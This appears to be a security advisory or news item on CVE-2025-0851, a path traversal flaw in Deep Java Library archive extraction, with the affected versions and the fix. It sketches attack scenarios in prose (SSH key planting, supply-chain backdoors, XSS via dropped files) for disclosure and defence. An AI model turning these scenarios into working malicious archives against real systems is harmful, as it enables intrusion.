
A newly discovered vulnerability in the Deep Java Library (DJL) has been found to leave systems open to potential attacks.
The vulnerability, identified as CVE-2025-0851 (CVSS 9.8), is a path traversal issue in the ZipUtils.unzip and TarUtils.untar utilities. These utilities are used for extracting tar and zip model archives when loading models for use with DJL. The issue affects DJL versions 0.1.0 to 0.31.0 and exists due to a failure to protect against absolute path traversal during the extraction process.
This vulnerability allows a bad actor to write files to arbitrary locations on a system. A path traversal vulnerability in AI and machine learning frameworks introduces serious security risks, particularly in cloud and enterprise environments where models are frequently shared and deployed. Here’s how attackers could exploit CVE-2025-0851:
- Remote SSH Takeover – By embedding a malicious SSH key in a model archive, attackers could gain persistent access to compromised machines.
- Supply Chain Attacks – AI researchers and data scientists often download pre-trained models from external sources. A compromised archive could introduce backdoors into corporate AI pipelines.
- Cross-Site Scripting (XSS) Attacks – Attackers could inject rogue HTML files into web-accessible directories, compromising web applications and user sessions.
The vulnerability has been patched in DJL 0.31.1. Users are strongly encouraged to update to the latest version to mitigate the risk.
As a workaround, users should avoid using model archive files from untrusted sources. It is recommended to only use model archives from official sources like the DJL Model Zoo, or models that have been created and packaged by the users themselves.